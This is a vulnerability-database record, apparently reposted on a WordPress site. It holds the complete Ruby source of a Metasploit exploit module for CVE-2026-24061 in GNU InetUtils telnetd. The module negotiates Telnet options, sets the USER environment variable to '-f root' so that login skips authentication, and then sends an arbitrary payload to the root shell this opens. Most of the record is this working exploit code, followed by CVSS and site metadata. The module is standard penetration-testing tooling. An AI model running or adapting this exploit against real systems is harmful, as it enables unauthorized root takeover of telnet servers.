{“lastseen”:”2026-02-12T19:28:02″,”description”:”The telnetd service from GNU InetUtils is vulnerable to authentication-bypass, tracked as CVE-2026-24061, in versions up to version 2.7. During Telnet authentication the SB byte can be sent to indicate sub-negotiation which allows for the exchange of…”,”published”:”2026-02-12T18:59:47″,”modified”:”2026-02-12T18:59:47″,”type”:”metasploit”,”title”:”GNU Inetutils Telnet Authentication Bypass Exploit CVE-2026-24061″,”source”:””,”references”:””,”id”:”MSF:EXPLOIT-LINUX-TELNET-GNU_INETUTILS_AUTH_BYPASS-“,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-24061″],”sourceData”:”##\\n# This module requires Metasploit: https:\/\/metasploit.com\/download\\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n##\\n\\nclass MetasploitModule \\u003c Msf::Exploit::Remote\\n\\n Rank = GreatRanking\\n\\n include Msf::Exploit::Remote::Telnet\\n include Msf::Exploit::Capture\\n\\n NEW_ENVIRON_IS = \\”\\\\x00\\”\\n NEW_ENVIRON_SEND = \\”\\\\x01\\”\\n NEW_ENVIRON_VAR = \\”\\\\x00\\”\\n NEW_ENVIRON_VALUE = \\”\\\\x01\\”\\n SPACE = \\”\\\\x20\\”\\n ZERO = \\”\\\\x00\\”\\n FF = \\”\\\\xff\\”\\n\\n def initialize(info = {})\\n super(\\n update_info(\\n info,\\n ‘Name’ =\\u003e ‘GNU Inetutils Telnet Authentication Bypass Exploit CVE-2026-24061’,\\n ‘Description’ =\\u003e %q{\\n The telnetd service from GNU InetUtils is vulnerable to authentication-bypass, tracked as CVE-2026-24061, in\\n versions up to version 2.7. During Telnet authentication the SB byte can be sent to indicate sub-negotiation which\\n allows for the exchange of sub-option parameters after both parties have agreed to enable a specific functional option.\\n Environment variables can be sent as sub-options and it’s the USER environment variable which introduces the\\n authentication bypass in this scenario. When the USER environment variable gets sent to the GNU inetutils telnetd\\n service during authentication, the variable gets appended without proper sanitization to an execv call to the\\n \/usr\/bin\/login binary. The login binary has a -f flag which skips authentication for a specific user. So the exploit\\n sets the `USER` environment variable to -f root and the telnetd service responds with a root shell.\\n },\\n ‘Author’ =\\u003e [\\n ‘jheysel-r7’, # Metasploit module\\n ‘Kyu Neushwaistein’ # aka Carlos Cortes Alvarez, discovery\\n ],\\n ‘References’ =\\u003e [\\n [‘CVE’, ‘2026-24061’],\\n [‘URL’, ‘https:\/\/github.com\/DeadlyHollows\/CVE-2026-24061-setup’], # Target setup\\n [‘URL’, ‘https:\/\/www.safebreach.com\/blog\/safebreach-labs-root-cause-analysis-and-poc-exploit-for-cve-2026-24061\/’],\\n [‘ATT\\u0026CK’, Mitre::Attack::Technique::T1021_REMOTE_SERVICES]\\n ],\\n ‘DisclosureDate’ =\\u003e ‘2026-01-26’, # Python PoC (TCP)\\n ‘License’ =\\u003e MSF_LICENSE,\\n ‘Platform’ =\\u003e %w[unix linux],\\n ‘Arch’ =\\u003e ARCH_CMD,\\n ‘Privileged’ =\\u003e true,\\n ‘Targets’ =\\u003e [\\n [ ‘Automatic’, {} ]\\n ],\\n ‘Notes’ =\\u003e {\\n ‘Reliability’ =\\u003e [UNRELIABLE_SESSION], # Should always return a session on the first run but after that a session is not guaranteed – this behaviour is specific to version 1.9.4 of InetUtils running on Ubuntu 18.04\\n ‘Stability’ =\\u003e [CRASH_SAFE],\\n ‘SideEffects’ =\\u003e []\\n }\\n )\\n )\\n\\n register_options([\\n Opt::RPORT(23),\\n OptString.new(‘USERNAME’, [true, ‘Username on device to bypass authentication as’, ‘root’]),\\n OptString.new(‘TERMINAL_TYPE’, [true, ‘Terminal type to set when authenticating’, ‘XTERM-256COLOR’]),\\n OptInt.new(‘TERMINAL_SPEED’, [true, ‘Terminal speed to set when authenticating’, 38400])\\n ])\\n end\\n\\n def recv_telnet(fd, timeout)\\n data = ”\\n bytes_to_send = ”\\n\\n begin\\n data = fd.get_once(-1, timeout)\\n return nil if data.blank?\\n\\n data_string = telnet_bytes_to_names(data)\\n vprint_status(‘Incoming Bytes: ‘ + data_string)\\n\\n if @client_sends == 0\\n bytes_to_send =\\n IAC + WILL + OPT_AUTHENTICATION +\\n IAC + DO + OPT_SGA +\\n IAC + WILL + OPT_TTYPE +\\n IAC + WILL + OPT_NAWS +\\n IAC + WILL + OPT_TSPEED +\\n IAC + WILL + OPT_LFLOW +\\n IAC + WILL + OPT_LINEMODE +\\n IAC + WILL + OPT_NEW_ENVIRON +\\n IAC + DO + OPT_STATUS\\n elsif @client_sends == 1\\n bytes_to_send =\\n IAC + DO + OPT_AUTHENTICATION +\\n IAC + DONT + OPT_ENCRYPT +\\n IAC + WONT + OPT_XDISPLOC +\\n IAC + WONT + OPT_OLD_ENVIRON\\n elsif @client_sends == 2\\n\\n # For more info on Telnet Linemode Option please reference: https:\/\/www.rfc-editor.org\/rfc\/rfc1184.html\\n # The following binary blob was copied from a wireshark dump of a working PoC which used the telnet binary\\n linemode_slc =\\n \\”\\\\x03\\\\x01\\\\x03\\\\x00\\\\x03\\\\x62\\\\x03\\\\x04\\\\x02\\\\x0f\\\\x05\\\\x02\\\\x14\\\\x07\\\\x62\\” \\\\\\n \\”\\\\x1c\\\\x08\\\\x02\\\\x04\\\\x09\\\\x42\\\\x1a\\\\x0a\\\\x02\\\\x7f\\\\x0b\\\\x02\\\\x15\\\\x0c\\” \\\\\\n \\”\\\\x02\\\\x17\\\\x0d\\\\x02\\\\x12\\\\x0e\\\\x02\\\\x16\\\\x0f\\\\x02\\\\x11\\\\x10\\\\x02\\” \\\\\\n \\”\\\\x13\\\\x11\\\\x00\\” + FF + FF + \\”\\\\x12\\\\x00\\” + FF + FF\\n\\n bytes_to_send =\\n IAC + SB + OPT_AUTHENTICATION +\\n ZERO + ZERO + ZERO +\\n IAC + SE +\\n IAC + SB + OPT_NAWS +\\n \\”\\\\x00\\\\x7e\\” + \\”\\\\x00\\\\x3d\\” +\\n IAC + SE +\\n IAC + SB + OPT_LINEMODE +\\n linemode_slc +\\n IAC + SE +\\n IAC + DO + OPT_SGA +\\n IAC + SB + OPT_LINEMODE +\\n \\”\\\\x01\\\\x14\\” +\\n IAC + SE\\n IAC + SE\\n elsif @client_sends == 3\\n print_status(‘Sending authentication bypass…’)\\n bytes_to_send =\\n IAC + SB + OPT_TSPEED +\\n NEW_ENVIRON_IS +\\n \\”#{datastore[‘TERMINAL_SPEED’]},#{datastore[‘TERMINAL_SPEED’]}\\” +\\n IAC + SE +\\n IAC + SB + OPT_NEW_ENVIRON +\\n NEW_ENVIRON_IS +\\n NEW_ENVIRON_VAR + ‘USER’ +\\n NEW_ENVIRON_SEND + ‘-f’ + SPACE + datastore[‘USERNAME’] + # this is the auth bypass, sending ‘-f root’ as the NEW_ENVIRON_VAR \\”USER\\”\\n IAC + SE +\\n IAC + SB + OPT_TTYPE +\\n NEW_ENVIRON_IS +\\n datastore[‘TERMINAL_TYPE’] +\\n IAC + SE\\n elsif @client_sends == 4\\n bytes_to_send = IAC + WONT + OPT_ECHO\\n elsif @client_sends == 5\\n bytes_to_send = IAC + DO + OPT_ECHO +\\n IAC + WILL + OPT_BINARY +\\n IAC + WONT + OPT_LINEMODE\\n elsif @client_sends == 6\\n print_status(‘Sending payload…’)\\n bytes_to_send = payload.encoded + \\”\\\\x0d\\\\x0a\\”\\n end\\n\\n if datastore[‘VERBOSE’]\\n if @client_sends == 6\\n vprint_status(‘Outgoing Bytes: ‘ + bytes_to_send)\\n else\\n vprint_status(‘Outgoing Bytes: ‘ + telnet_bytes_to_names(bytes_to_send))\\n end\\n end\\n\\n fd.write(bytes_to_send) unless bytes_to_send.empty?\\n\\n @trace \\u003c\\u003c data\\n @recvd \\u003c\\u003c data\\n fd.flush\\n @client_sends += 1\\n rescue ::EOFError, ::Errno::EPIPE =\\u003e e\\n fail_with(Failure::UnexpectedReply, \\”Sending data failed with error: #{e}\\”)\\n end\\n\\n data\\n end\\n\\n def exploit\\n @client_sends = 0\\n print_status(‘Connecting to telnet service… ‘)\\n connect\\n rescue ::Rex::ConnectionError =\\u003e e\\n print_error(\\”Connection failed: #{e.message}\\”)\\n ensure\\n disconnect\\n end\\nend\\n”,”sourceHref”:”https:\/\/github.com\/rapid7\/metasploit-framework\/blob\/master\/modules\/exploits\/linux\/telnet\/gnu_inetutils_auth_bypass.rb”,”cvss”:{“score”:9.8,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.rapid7.com\/db\/modules\/exploit\/linux\/telnet\/gnu_inetutils_auth_bypass\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-02-12T19:28:02″,”description”:”The telnetd service from GNU InetUtils is vulnerable to authentication-bypass, tracked as CVE-2026-24061, in versions up to version 2.7. During Telnet authentication the SB byte…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,35,12,169,13,7,11,5],"class_list":["post-40665","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-98","tag-exploit","tag-metasploit","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n